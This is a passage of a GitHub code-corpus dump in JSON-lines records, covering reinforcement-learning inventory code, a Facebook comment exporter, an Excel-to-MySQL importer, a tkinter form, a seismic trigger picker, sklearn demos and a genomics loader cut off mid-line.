\"hard_update_every\": args.target_update,\r\n 'opt_soft_update': args.opt_soft_update,\r\n 'opt_ddqn': args.opt_ddqn\r\n }\r\n\r\n dqn = CustomDQNAgent(\r\n state_size=args.past_demand + 3,\r\n action_size=2,\r\n qnetwork_local=policy_net,\r\n qnetwork_target=target_net,\r\n optimizer=None,\r\n new_hyperparameters=new_hyperparameters,\r\n seed=args.seed,\r\n device=device,\r\n model_output_dir=output_dir,\r\n opt_soft_update=False,\r\n opt_ddqn=False)\r\n\r\n if args.resume:\r\n dqn.load_state_dicts()\r\n\r\n if args.train:\r\n e = CustomGymEnvironment(env=env,\r\n algorithm=dqn,\r\n seed=args.seed,\r\n logger=logger,\r\n gifs_recorder=None)\r\n e.train(num_episodes=args.num_episodes, max_t=None, add_noise=True,\r\n scores_window_size=100, save_every=1)\r\n\r\n if args.test:\r\n print('\\ntest\\n')\r\n e_test = CustomGymEnvironment(env=test_env,\r\n algorithm=dqn,\r\n seed=args.seed,\r\n logger=logger,\r\n gifs_recorder=None)\r\n e_test.test(num_episodes=1, load_state_dicts=True, render=True)\r\n","repo_name":"Tanveer81/Inventory_Optimization_RL","sub_path":"dqn_date.py","file_name":"dqn_date.py","file_ext":"py","file_size_in_byte":11321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43966380608","text":"\"\"\" Extract all Comments from posts/feed from FB Page \"\"\"\r\n\"\"\"\r\n\tFile description:\r\n\tExtract Comments related to Page posts from FB and exports them to CSV file\r\n\t\r\n\tCreated by: Iviglious\r\n\tCreated date: 03 Aug 2017\r\n\t\r\n\tDescription of the input:\r\n\tXML_CONFIG_FILE - path and name of the XML file.\r\n\tIt's controlled by a XML config file, which contains the user data:\r\n\t - User ID\r\n\t - Access Token\r\n\t - FB Graph URLs\r\n\t - etc.\r\n\tCSV_EXPORT_FILE - path and name of the CSV file.\r\n\"\"\"\r\n\r\nimport time\r\nimport requests as REQ\r\nimport json\r\nimport csv\r\nimport re\r\nfrom datetime import date, timedelta\r\nfrom xml.dom import minidom\r\n\r\n############################################################\r\n## Define Functions and Constants\r\n############################################################\r\n\r\nXML_CONFIG_FILE = r'fb_api_config.xml'\r\nCSV_EXPORT_FILE = r'fb_page_comments.csv'\r\n\r\ndef XmlGetValue(xmldoc, tag_name):\r\n \"\"\" Function to retrieve the value of XML node \"\"\"\r\n return str(xmldoc.getElementsByTagName(tag_name)[0].childNodes[0].nodeValue)\r\n\r\n\r\n############################################################\r\n## Script Body\r\n############################################################\r\n\r\n# Start\r\nprint(\"Started...\")\r\n\r\n# Get API configuration from XML\r\nxmldoc = minidom.parse(XML_CONFIG_FILE)\r\n# feed_id\r\napi_url_feed_id = XmlGetValue(xmldoc, 'root_url')\r\napi_url_feed_id += '/' + XmlGetValue(xmldoc, 'page_id')\r\napi_url_feed_id += '/' + XmlGetValue(xmldoc, 'page_feedid_url')\r\napi_url_feed_id += '&access_token=' + XmlGetValue(xmldoc, 'page_access_token')\r\n#print(api_url_feed_id)\r\napi_mdata_feed_id = XmlGetValue(xmldoc, 'page_feed_mdata')\r\n#print(api_mdata_feed_id)\r\n\r\n# comments\r\napi_url_comm = XmlGetValue(xmldoc, 'root_url')\r\napi_url_comm += '/' + XmlGetValue(xmldoc, 'page_comments_url')\r\napi_url_comm += '&access_token=' + XmlGetValue(xmldoc, 'page_access_token')\r\n#print(api_url_comm)\r\napi_mdata_comm = XmlGetValue(xmldoc, 'page_comments_mdata')\r\n#print(api_mdata_comm)\r\n\r\n\r\n# Prepare CSV\r\ncsvfile = open(CSV_EXPORT_FILE, 'w', encoding='utf-8')\r\ncsvwriter = csv.DictWriter( csvfile\r\n 
, fieldnames=['id','post_id','created_time','from_id','from_name','message','image_url']\r\n , dialect = 'excel'\r\n , delimiter = ','\r\n , lineterminator='\\r')\r\ncsvwriter.writeheader()\r\n\r\n# Prepare regexp: remove new line symbols\r\nrx = '[' + re.escape(''.join(['\\r','\\r\\n'])) + ']'\r\n\r\n# Call the Feed API\r\ntotal_rows = 0\r\napi_res = REQ.get(api_url_feed_id, data=api_mdata_comm)\r\nif (api_res.ok):\r\n jRes = api_res.json()['data']\r\n #print(\"Number of rows (feed): {0}\".format(len(jRes)))\r\n\r\n # Feed Loop\r\n for jRow in jRes:\r\n # Get post_id\r\n feed_id = jRow['id']\r\n\r\n # Prepare the Comments API\r\n api_url_comm_current = api_url_comm.replace('{feed_id}', feed_id)\r\n\r\n # Call the Comments API\r\n num_rows = 0\r\n api_res = REQ.get(api_url_comm_current, data=api_mdata_comm)\r\n if (api_res.ok):\r\n jRes = api_res.json()\r\n # Check if there are comments in current post\r\n if ('comments' not in jRes): continue\r\n \r\n num_rows = len(jRes['comments']['data'])\r\n #print(\"Number of rows (comments): {0}\".format(num_rows))\r\n\r\n feed_id = jRes['id']\r\n # Comments Loop\r\n for jRow in jRes['comments']['data']:\r\n # Prepare the text fields\r\n message_str = ''\r\n if ('message' in jRow): message_str = re.sub(rx, ' ', jRow['message'])\r\n image_url_str = ''\r\n if ('attachment' in jRow\r\n and 'media' in jRow['attachment']\r\n and 'image' in jRow['attachment']['media']\r\n and 'src' in jRow['attachment']['media']['image']):\r\n image_url_str = re.sub(rx, ' ', jRow['attachment']['media']['image']['src'])\r\n\r\n # Export to CSV\r\n csvwriter.writerow(\r\n {\r\n 'id' :jRow['id']\r\n ,'post_id' :feed_id\r\n ,'created_time' :jRow['created_time'][0:19].replace(\"T\", \" \")\r\n ,'from_id' :jRow['from']['id']\r\n ,'from_name' :jRow['from']['name']\r\n ,'message' :message_str\r\n ,'image_url' :image_url_str\r\n })\r\n \r\n else:\r\n api_res.raise_for_status()\r\n total_rows += num_rows\r\n\r\nelse:\r\n api_res.raise_for_status()\r\n\r\n# Close CSV file\r\ncsvfile.close()\r\n\r\n# Finished\r\nprint(\"Finished. {0} row(s) extracted.\".format(total_rows))\r\n","repo_name":"Iviglious/facebook_scrape","sub_path":"fb_extract_page_comments.py","file_name":"fb_extract_page_comments.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21241637353","text":"import torch\n\nfrom . import DropletTransform\n\n\nclass DropletBiasRemoval(DropletTransform):\n\n def __init__(self, min_intensity: float = 0, max_intensity: float = 1,\n min_quantile: float = 0.05, max_quantile: float = 0.98) -> None:\n \"\"\"\n Instead of Bias Field Removal on the whole image we deal with it on the Droplet Level.\n This is intuitively justified by the fact, that the bias field is roughly constant on one single droplet (due to their\n small size). 
Furthermore it is quite rare that a subplot line intersects with single droplets.\n \"\"\"\n super().__init__()\n self.min_intensity = min_intensity\n self.max_intensity = max_intensity\n self.min_quantile = min_quantile\n self.max_quantile = max_quantile\n\n def transform(self, drop: torch.FloatTensor) -> torch.FloatTensor:\n \"\"\"\n Min - Max Normalization to approximate constant multiplicative factor.\n \"\"\"\n\n # Get quantiles\n l_intensity = torch.quantile(drop, self.min_quantile)\n u_intensity = torch.quantile(drop, self.max_quantile)\n\n # Moves the min_quantile to 0\n drop -= l_intensity\n\n # Truncates below l_intensity\n drop[drop < 0] = 0\n \n # Truckate above moved version of u_intensity\n m = u_intensity - l_intensity\n drop[drop > m] = m\n\n # Rescale and translate\n new_m = self.max_intensity - self.min_intensity\n drop = drop / m * new_m + self.min_intensity\n\n return drop\n","repo_name":"JohanLokna/TumoroidClassification","sub_path":"pipeline/transform/droplet_biasremoval.py","file_name":"droplet_biasremoval.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34129260572","text":"# 在Excel最后一列加上日期、删除前两行、导入数据库\n\nimport os\nimport xlrd\nimport xlutils.copy\nimport re\nimport win32com.client # 这里用到win32com.client,需要安装pywin32模块\nimport pymysql\nimport pandas as pd\nimport sys\nfrom sqlalchemy import create_engine\n\n\n# 文件路径\npath = 'E:\\\\旧每日数据\\\\12月数据\\\\20171115/'\n\n\n# 添加日期、商品编码函数\ndef add_date():\n for f in os.listdir(path): # 要处理的excel文件路径\n # print(\"file:\", f )\n try:\n print(\"file:\", f)\n name = re.match('.*.xls', str(f)).group()\n # print(name)\n rb = xlrd.open_workbook(path+name) # 打开excel\n sheet = rb.sheet_by_index(0) # 获得sheet\n # date = sheet.cell(1,0).value[5:13] # 获取第二行第一列的内容\n date = path[-9:-1]\n # code = name[12:20]\n # code = name[8:16]\n code = re.search(\"[0-9]{8}\", name).group()\n print(code)\n print(date)\n wb = xlutils.copy.copy(rb)\n ws = wb.get_sheet(0)\n # print(sheet.nrows)\n ws.write(2, 13, '商品编码')\n ws.write(2, 14, '日期') # 在第三行14列写入日期\n\n for rows in range(3, sheet.nrows):\n ws.write(rows, 14, date) # 在第三行到最后一行14列写入获取的时间\n for rows in range(3, sheet.nrows):\n ws.write(rows, 13, code) # 在第三行到最后一行13列写入获取的编码\n wb.save(path + f)\n except AttributeError:\n print(\"file:\")\n\n\ndef del_row():\n xlApp = win32com.client.Dispatch('Excel.Application') # 打开EXCEL\n for f in os.listdir(path):\n try:\n name = re.match('.*.xls', str(f)).group()\n print(\"file:\", name)\n xlBook = xlApp.Workbooks.Open(path + name)\n xlSht = xlBook.Worksheets('客户日订货情况表') # 要处理的excel页,默认第一页是‘sheet1’\n for i in range(1, 2):\n xlSht.Rows(i).Delete()\n xlBook.Close(SaveChanges=1) # 完成 关闭保存文件\n except AttributeError:\n continue\n del xlApp\n\n\ndef to_mysql():\n\n for f in os.listdir(path):\n # print(\"file:\", f)\n try:\n name = re.match('.*.xls', str(f)).group()\n df = pd.read_excel(path + name)\n print(name)\n # df = df.ix[1:, [1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19]] # 行,列\n df = df.ix[1:, [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]]\n print(df.head())\n yconnect = create_engine('mysql+pymysql://root:root@192.168.31.130:3306/pos?charset=utf8')\n pd.io.sql.to_sql(df, 'dec', yconnect, if_exists='append',index=None)\n except AttributeError:\n 
print(\"file:\")\n\n\nadd_date()\ndel_row()\ndel_row()\nto_mysql()","repo_name":"Narcissus7/tools","sub_path":"add_date.py","file_name":"add_date.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30504038955","text":"from tkinter import *\nfrom tkinter import ttk\nfrom tkinter import messagebox\nfrom no_ui_main import *\nimport datetime\nimport json\n\ntoday = datetime.date.today()\ncurrent_year = today.year + 1\n\n\n# defining\n# controls rd entry, makes it so you can't input text and write more than 4 digits\ndef validate_rd(P):\n if len(P) == 0:\n return True\n elif len(P) < 5 and P.isdigit():\n return True\n else:\n return False\n\n\ndef validate_age(P):\n if len(P) == 0:\n return True\n elif len(P) < 3 and P.isdigit():\n return True\n else:\n return False\n\n\n# controls date entry, makes it so you can't write a wrong date\ndef validate_dt(P):\n if not P == \"DD/MM/YYYY\":\n if len(P) == 0:\n return True\n elif len(P) < 3:\n try:\n if int(P[0:2]) < 32:\n return True\n else:\n return False\n except:\n return False\n elif len(P) > 2 and len(P) < 6 and P[2] == \"/\":\n try:\n if len(P) > 3:\n if int(P[3:5]) < 13:\n return True\n else:\n return False\n else:\n return True\n except:\n return False\n elif len(P) > 5 and len(P) < 11 and P[2] == \"/\" and P[5] == \"/\":\n if len(P) == 10:\n try:\n if int(P[6:11]) < current_year and int(P[6:11]) > 1999:\n return True\n else:\n return False\n except:\n return False\n else:\n return True\n else:\n return False\n else:\n return True\n\n\n# controls time entry, makes it so you can't write an invalid time\ndef validate_tm(P):\n if not P == \"HH:MM\":\n if len(P) == 0:\n return True\n elif len(P) < 3:\n try:\n if int(P[0:2]) < 24:\n return True\n else:\n return False\n except:\n return False\n elif len(P) > 2 and len(P) < 6 and P[2] == \":\":\n if len(P) == 5:\n try:\n if int(P[3:5]) < 60:\n return True\n else:\n return False\n except:\n return False\n else:\n return True\n else:\n return False\n else:\n return True\n\n\n# --- MAIN --- #\ndef main():\n # inner functions\n # removes temp text in the time entry\n def c_temp_time(e):\n if time_entry.get() == \"HH:MM\":\n time_entry.delete(0, END)\n\n # adds temp text in the time entry\n def a_temp_time(e):\n print(len(time_entry.get()))\n if time_entry.get() == \"\":\n time_entry.insert(0, \"HH:MM\")\n elif len(time_entry.get()) < 5:\n time_entry.delete(0, END)\n time_entry.insert(0, \"HH:MM\")\n\n # removes temp text in the date entry\n def c_temp_date(e):\n if date_entry.get() == \"DD/MM/YYYY\":\n date_entry.delete(0, END)\n\n # adds temp text in the date entry\n def a_temp_date(e):\n print(len(date_entry.get()))\n if date_entry.get() == \"\":\n date_entry.insert(0, \"DD/MM/YYYY\")\n elif len(date_entry.get()) < 10:\n date_entry.delete(0, END)\n date_entry.insert(0, \"DD/MM/YYYY\")\n\n # takes all the stuff from the entries/comboboxes and generates the template\n def submit():\n to_fill_in[\"DIVISION\"] = selected_div.get()\n to_fill_in[\"DR\"] = dr\n to_fill_in[\"FULL_NAME\"] = fn_entry.get()\n to_fill_in[\"SEX\"] = selected_sex.get()\n to_fill_in[\"AGE\"] = age_entry.get()\n to_fill_in[\"LOCATION\"] = lc_entry.get()\n to_fill_in[\"RD\"] = rd_entry.get()\n to_fill_in[\"ETHNICITY\"] = eth_entry.get()\n to_fill_in[\"HAIR\"] = hair_entry.get()\n to_fill_in[\"TIME\"] = time_entry.get()\n to_fill_in[\"DATE\"] = date_entry.get()\n to_fill_in[\"OFFENSE\"] = of_entry.get().upper()\n 
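# the remaining fields come straight from their widgets; DIVISION_CAPS is derived below\n        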
to_fill_in[\"WEAPONS\"] = wp_entry.get()\n to_fill_in[\"DESCRIPTION\"] = dsc_text.get(\"1.0\", END)\n to_fill_in[\"DIVISION_CAPS\"] = to_fill_in[\"DIVISION\"].upper()\n # print(json.dumps(to_fill_in, sort_keys=True, indent=4))\n passed = False\n for k in to_fill_in:\n if to_fill_in[k] == \"\" or to_fill_in[k] == \"\\n\" or to_fill_in[k] == \"null\" or to_fill_in[k] == \"HH:MM\" or to_fill_in[k] == \"DD/MM/YYYY\":\n messagebox.showerror(\"Incorrect input\", f\"Please fill in the {k} field.\")\n passed = False\n break\n else:\n passed = True\n if passed:\n full_name = to_fill_in[\"FULL_NAME\"]\n full_name_mugshot = full_name.lower().replace(\" \", \"_\")\n mugshot = save_file()\n if not mugshot:\n messagebox.showwarning(\"No mugshot\", f\"Mugshot {full_name_mugshot}.png/jpg/jpeg was not found in mugshot/.\")\n messagebox.showinfo(\"Complete\", f\"Wanted poster for {full_name} is complete.\")\n \n\n # root\n root = Tk()\n root.title(\"WANTED!\")\n root.resizable(False, False)\n root.minsize(250, 450)\n\n # icon\n icon = PhotoImage(file=\"icon.png\")\n root.iconphoto(True, icon)\n\n # frame\n main_frame = Frame(root)\n\n # --- ROW 0 -- #\n r0_frame = Frame(main_frame)\n # division (label + combobox)\n selected_div = StringVar()\n divisions = [\n \"Central\",\n \"South\",\n \"Valley\",\n \"West\",\n ]\n div_label = Label(r0_frame, text=\"Division:\", pady=7)\n div_label.grid(row=0, column=0, padx=(0, 7))\n div_dropdown = ttk.Combobox(\n r0_frame, values=divisions, width=7, textvariable=selected_div\n )\n div_dropdown[\"state\"] = \"readonly\"\n div_dropdown.grid(row=0, column=1, pady=7)\n\n # rd (label + stringvar)\n temp_frame = Frame(r0_frame, width=20).grid(row=0, column=2)\n dr = create_dr()\n dr_label = Label(r0_frame, text=f\"DR: {dr}\")\n dr_label.grid(row=0, column=3)\n # --- ROW 0 END --- #\n r0_frame.grid(row=0, column=0)\n\n # --- ROW 1 -- #\n r1_frame = Frame(main_frame)\n # full name (label + entry)\n fn_label = Label(r1_frame, text=\"Full name: \")\n fn_label.grid(row=0, column=0)\n fn_entry = Entry(r1_frame)\n fn_entry.config(width=27)\n fn_entry.grid(row=0, column=1)\n # --- ROW 1 END --- #\n r1_frame.grid(row=1, column=0)\n\n # --- ROW 2 --- #\n r2_frame = Frame(main_frame)\n # sex (label + combobox)\n sex_label = Label(r2_frame, text=\"Sex: \", padx=7).grid(row=0, column=0)\n sexes = [\n \"Male\",\n \"Female\",\n \"Unknown\",\n ]\n selected_sex = StringVar()\n sex_dropdown = ttk.Combobox(\n r2_frame, values=sexes, textvariable=selected_sex, width=9\n ).grid(row=0, column=1, pady=7)\n\n # age (label + entry)\n temp_frame2 = Frame(r2_frame, width=50).grid(row=0, column=2)\n age_label = Label(r2_frame, text=\"Age:\").grid(row=0, column=3, padx=(5, 0))\n vcmd_age = (root.register(validate_age), \"%P\")\n age_entry = Entry(r2_frame, width=4, validate=\"key\", validatecommand=vcmd_age)\n age_entry.grid(row=0, column=4, padx=7)\n # --- ROW 2 END --- #\n r2_frame.grid(row=2, column=0)\n\n # --- ROW 3 --- #\n r3_frame = Frame(main_frame)\n # location (label + entry)\n lc_label = Label(r3_frame, text=\"Location: \").grid(row=0, column=0)\n lc_entry = Entry(r3_frame, width=18)\n lc_entry.grid(row=0, column=1)\n\n # rd (label + entry)\n rd_label = Label(r3_frame, text=\"RD#: \").grid(row=0, column=2)\n vcmd_rd = (root.register(validate_rd), \"%P\")\n rd_entry = Entry(r3_frame, width=4, validate=\"key\", validatecommand=vcmd_rd)\n rd_entry.grid(row=0, column=3)\n # --- ROW 3 END --- #\n r3_frame.grid(row=3, column=0)\n\n # --- ROW 4 --- #\n r4_frame = Frame(main_frame)\n # ethnicity (label 
+ entry)\n eth_label = Label(r4_frame, text=\"Ethnicity: \").grid(row=0, column=0)\n eth_entry = Entry(r4_frame, width=11)\n eth_entry.grid(row=0, column=1)\n\n # hair (label + entry)\n hair_label = Label(r4_frame, text=\"Hair: \").grid(row=0, column=2)\n hair_entry = Entry(r4_frame, width=11)\n hair_entry.grid(row=0, column=3, pady=7)\n # --- ROW 4 END --- #\n r4_frame.grid(row=4, column=0)\n\n # --- ROW 5 --- #\n r5_frame = Frame(main_frame)\n temp_frame3 = Frame(r5_frame, width=30).grid(row=0, column=2)\n # time (label + entry)\n time_label = Label(r5_frame, text=\"Time: \").grid(row=0, column=0)\n vcmd_tm = (root.register(validate_tm), \"%P\")\n time_entry = Entry(r5_frame, width=7, validate=\"key\", validatecommand=vcmd_tm)\n time_entry.insert(0, \"HH:MM\")\n time_entry.bind(\"\", c_temp_time)\n time_entry.bind(\"\", a_temp_time)\n time_entry.grid(row=0, column=1)\n # date (label + entry)\n date_label = Label(r5_frame, text=\"Date: \").grid(row=0, column=3)\n vcmd_dt = (root.register(validate_dt), \"%P\")\n date_entry = Entry(r5_frame, width=13, validate=\"key\", validatecommand=vcmd_dt)\n date_entry.insert(0, \"DD/MM/YYYY\")\n date_entry.bind(\"\", c_temp_date)\n date_entry.bind(\"\", a_temp_date)\n date_entry.grid(row=0, column=4)\n # --- ROW 5 END --- #\n r5_frame.grid(row=5, column=0)\n\n # --- ROW 6 --- #\n r6_frame = Frame(main_frame)\n # offense (label + entry)\n of_label = Label(r6_frame, text=\"Offense: \").grid(row=0, column=0)\n of_entry = Entry(r6_frame, width=29)\n of_entry.grid(row=0, column=1, pady=(7,0))\n # --- ROW 6 END --- #\n r6_frame.grid(row=6, column=0)\n\n # --- ROW 7 --- #\n r7_frame = Frame(main_frame)\n # weapons (label + entry)\n wp_label = Label(r7_frame, text=\"Weapon(s): \").grid(row=0, column=0, pady=(0,7))\n wp_entry = Entry(r7_frame, width=26)\n wp_entry.grid(row=0, column=1)\n # --- ROW 7 END --- #\n r7_frame.grid(row=7, column=0)\n\n # --- ROW 8 --- #\n r8_frame = Frame(main_frame)\n # description (label + text + button)\n dsc_label = Label(r8_frame, text=\"Description: \").pack(side=TOP, anchor=NW)\n dsc_text = Text(r8_frame, width=38, height=12, wrap=WORD)\n dsc_text.config(font=\"Calibri 9\")\n dsc_text.pack(side=TOP)\n dsc_button = Button(r8_frame, text=\"Generate!\", command=submit).pack(\n side=TOP, pady=7\n )\n # --- ROW 8 END --- #\n r8_frame.grid(row=8, column=0)\n\n # frame end\n main_frame.grid(row=0, column=0)\n\n root.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n\n\n# ---------------------------------------------- #\n# Division: (dropdown) DR: (checkbox if random, if not - entry)\n# Full name: | (entry) |#\n# Sex: (dropdown) Age: |(entry)| #\n# Location: |(entry) | RD: |(entry)|#\n# Ethnicity: |(entry) | Hair: |(entry) |#\n# Time: |(entry)| Date: |(entry) |#\n# Offense: |(entry) |#\n# Weapons: |(entry) |#\n# Description: #\n# |(entry) |#\n# | |#\n# | |#\n# | |#\n# | |#\n# | |#\n# ---------------------------------------------- #\n# (button submit) #\n# ---------------------------------------------- #\n","repo_name":"vad1m4/fill_wanted_suspect","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16242352912","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 13 11:17:23 2014\r\nTHIS PROGRAM USES THE STALTA PROGRAM TO SEARCHE THROUGH DOWNLOADED\r\nSEISMIC DATA AND WRITE TRIGGER TIMES TO A TEXT FILE\r\n@author: plin976\r\n\"\"\"\r\nfrom obspy import UTCDateTime\r\nfrom obspy 
import Stream\r\nfrom obspy import Trace\r\nimport obspy.signal\r\nfrom petfun import*\r\n\r\n#CHANGABLE SETTINGS\r\nstartUTC=UTCDateTime(2014,2,14,4,17,45) #CHECK\r\n#startUTC=UTCDateTime(2014,1,31,1,15,49) #CHECK\r\n#startUTC=UTCDateTime(2014,1,1,16,0,0) #very long Dur teleseismic\r\n#startUTC=UTCDateTime(2014,8,27,10,25,0) #MedDur/LowFreq\r\n#startUTC=UTCDateTime(2014,8,6,4,10,0) #LongDur/LowFreq\r\n#startUTC=UTCDateTime(2014,1,2,1,0,0) #Two ShortDur, closely spaced quakes\r\nplot='n' #y/n\r\ndownloadhours=1 #Normal is 1\r\ncycles=24*60\r\n\r\nS=1.5 #Tsta, long-->fewer picks at beginning of .sac file\r\nL=150 #Tlta, default 150, must be long to pick up fluid quakes\r\nshortdurfile='Pick_Short_2014-1' #short duration trigger file\r\nlongdurfile='Pick_Long_2014-1' #long duration trigger file\r\nT='5' #Trigger ratio\r\nD='1.5' #Detrigger ratio\r\nF='300' #Trigdsensetime, 50 default, doesn't seem to matter much\r\nP='40' #Trigduration, must >=50 so that one LongDur quake does not show up as multiple picks\r\nCutoff=60 #Cutoff for short/long duration, must be >P\r\nstation='WIZ'\r\nchannel='Z'\r\n\r\ndef FindTriggers(stream3,startUTC,S,L,T,D,F,P): #Input: str, startUTC,trigger/detrigger threshholdd Output: triggertimes in year:month:day:your:minute:second format\r\n triggertimesYMD=[]\r\n triggerdurationsfloat=[]\r\n stream3.write('stalta.sac',format='SAC') #Writes sac file\r\n if plot=='y':\r\n main([\"programstalta.py\",\"-S\",str(S),\"-L\",str(L),\"-T\",T,\"-D\",D,\"-F\",F,\"-P\",P,\"-p\",\"-w\",\"peterlog\",'stalta.sac']) ##run stalta program which writes logfile\r\n else:\r\n main([\"programstalta.py\",\"-S\",str(S),\"-L\",str(L),\"-T\",T,\"-D\",D,\"-F\",F,\"-P\",P,\"-w\",\"peterlog\",'stalta.sac']) ##run stalta program which writes logfile\r\n subprocess.call('rm stalta.sac', shell=True)\r\n triggertimes,triggerdurations=ReadTriggerLog('peterlog')\r\n\r\n print(\"LISTS\",triggertimes,triggerdurations)\r\n\r\n if triggertimes!=[]:\r\n for i in range(0,len(triggertimes)):\r\n year=str(startUTC.year)\r\n month=str(startUTC.month)\r\n day=str(startUTC.day)\r\n if len(month)==1:\r\n month='0'+month\r\n if len(day)==1:\r\n day='0'+day\r\n triggertimesYMD.append(year+'-'+month+'-'+day+'T'+triggertimes[i])\r\n triggerdurationsfloat.append(float(triggerdurations[i]))\r\n return triggertimesYMD,triggerdurationsfloat\r\n\r\ndef ReadTriggerLog(filename): #Input: filename of stalta program log file; Output: list of triggertimes (H:M:S)\r\n ref=open(filename,'r')\r\n linesskipped=13\r\n for i in range(0,linesskipped):\r\n ref.readline()\r\n entries=ref.read().split()\r\n ref.close()\r\n eventnum=(len(entries)-25)/16\r\n triggertimes=[]\r\n triggerdurations=[]\r\n for i in range(0,eventnum):\r\n triggertimes.append(entries[5+16*i])\r\n triggerdurations.append(entries[10+16*i])\r\n return triggertimes,triggerdurations\r\n \r\n\r\nj=0\r\nfor i in range(0,cycles):\r\n logtimes=[]\r\n sampleUTC=startUTC+j*60**2*downloadhours\r\n try: stream=GetProcessStreamJava(station,channel,sampleUTC-L,downloadhours*60**2+L) #StaLta doesn't start until t>L\r\n except:\r\n print('Could not load data!')\r\n if stream!=0:\r\n stream.detrend()\r\n logtimes,durations=FindTriggers(stream,sampleUTC,S,L,T,D,F,P)\r\n print(logtimes,durations)\r\n for i in range(0,len(logtimes)):\r\n if durations[i]<=Cutoff:\r\n WriteTriggers([logtimes[i]],shortdurfile)\r\n else:\r\n WriteTriggers([logtimes[i]],longdurfile)\r\n 
j+=1\r\n","repo_name":"petercl83/QuakeSearch","sub_path":"pick_stalta.py","file_name":"pick_stalta.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19050877142","text":"import numpy as np\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom sklearn.datasets import load_iris, load_breast_cancer, load_wine\nfrom sklearn.svm import LinearSVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nimport warnings\nwarnings.filterwarnings(action = 'ignore')\nfrom sklearn.metrics import accuracy_score, r2_score\n\n#1. 데이터\ndata_list = [load_iris(return_X_y= True), load_breast_cancer(return_X_y= True), \n load_wine(return_X_y= True),]\n\nmodel_list = [LinearSVC(), LogisticRegression(),\n DecisionTreeClassifier(), RandomForestClassifier(),]\n\ndata_name_list = ['아이리스 : ',\n '브레스트 캔서 : ',\n '와인 : ',]\n\nmodel_name_list = ['LinearSVC : ',\n 'LogisticRegression : ',\n 'DecisionTreeClassifier :',\n 'RF : ',]\n\n#2. 모델\nfor i, value in enumerate(data_list):\n x, y = value \n # print(x.shape, y.shape)\n print(\"=====================\") \n print(data_name_list[i])\n \n for j, value2 in enumerate(model_list):\n model= value2\n #3. 컴파일, 훈련\n model.fit(x, y)\n #4. 평가, 예측\n results = model.score(x, y) \n print(model_name_list[j], \"model.score : \", results)\n y_predict = model.predict(x)\n acc = accuracy_score(y, y_predict)\n print(model_name_list[j], \"accuracy_score : \", acc)\n\n\n# =====================\n# 아이리스 : \n# LinearSVC : model.score : 0.9666666666666667 \n# LinearSVC : accuracy_score : 0.9666666666666667\n# LogisticRegression : model.score : 0.9733333333333334 \n# LogisticRegression : accuracy_score : 0.9733333333333334\n# DecisionTreeClassifier : model.score : 1.0\n# DecisionTreeClassifier : accuracy_score : 1.0\n# RF : model.score : 1.0 \n# RF : accuracy_score : 1.0\n# =====================\n# 브레스트 캔서 :\n# LinearSVC : model.score : 0.9244288224956063\n# LinearSVC : accuracy_score : 0.9244288224956063\n# LogisticRegression : model.score : 0.9472759226713533\n# LogisticRegression : accuracy_score : 0.9472759226713533\n# DecisionTreeClassifier : model.score : 1.0\n# DecisionTreeClassifier : accuracy_score : 1.0\n# RF : model.score : 1.0\n# RF : accuracy_score : 1.0\n# =====================\n# 와인 :\n# LinearSVC : model.score : 0.9325842696629213\n# LinearSVC : accuracy_score : 0.9325842696629213\n# LogisticRegression : model.score : 0.9662921348314607\n# LogisticRegression : accuracy_score : 0.9662921348314607\n# DecisionTreeClassifier : model.score : 1.0\n# DecisionTreeClassifier : accuracy_score : 1.0\n# RF : model.score : 1.0\n# RF : accuracy_score : 1.0","repo_name":"seohee1205/study_aca","sub_path":"ml/ml01~10/m02_for_2_sample.py","file_name":"m02_for_2_sample.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41224391041","text":"t=int(input())\n\nfor i in range(t):\n s=input()\n z=s.split('0')\n x=[]\n for i in z:\n if i!='':\n x+=i,\n \n score=0\n lens=sorted(x,key=lambda i:len(i),reverse=True)\n for i in lens[0::2]:\n score+=len(i)\n print(score)","repo_name":"NvsYashwanth/Codeforces","sub_path":"CodeForces python/Substring Removal Game.py","file_name":"Substring Removal 
Game.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"5036870140","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport tensorflow_datasets as tfds\nimport numpy as np\n\ntrain_seq, train_label = tfds.as_numpy(tfds.load('genomics_ood', split='train[:10%]', batch_size=-1, as_supervised=True))\ntest_seq, test_label = tfds.as_numpy(tfds.load('genomics_ood', split='test[:1%]', batch_size=-1, as_supervised=True))\n\ndef onehotify(tensor):\n vocab = {'A':'1', 'C': '2', 'G':'3', 'T':'0'}\n for key in vocab.keys():\n tensor = tf.strings.regex_replace(tensor, key, vocab[key])\n split = tf.strings.bytes_split(tensor)\n labels = tf.cast(tf.strings.to_number(split), tf.uint8)\n onehot = tf.one_hot(labels, 4)\n onehot = tf.reshape(onehot, (-1,))\n return onehot\n\ntrain_seq = tf.data.Dataset.from_tensor_slices(train_seq)\ntrain_seq = train_seq.map(onehotify)\n\ntrain_label = tf.data.Dataset.from_tensor_slices(train_label)\ntrain_label = train_label.map(lambda t: 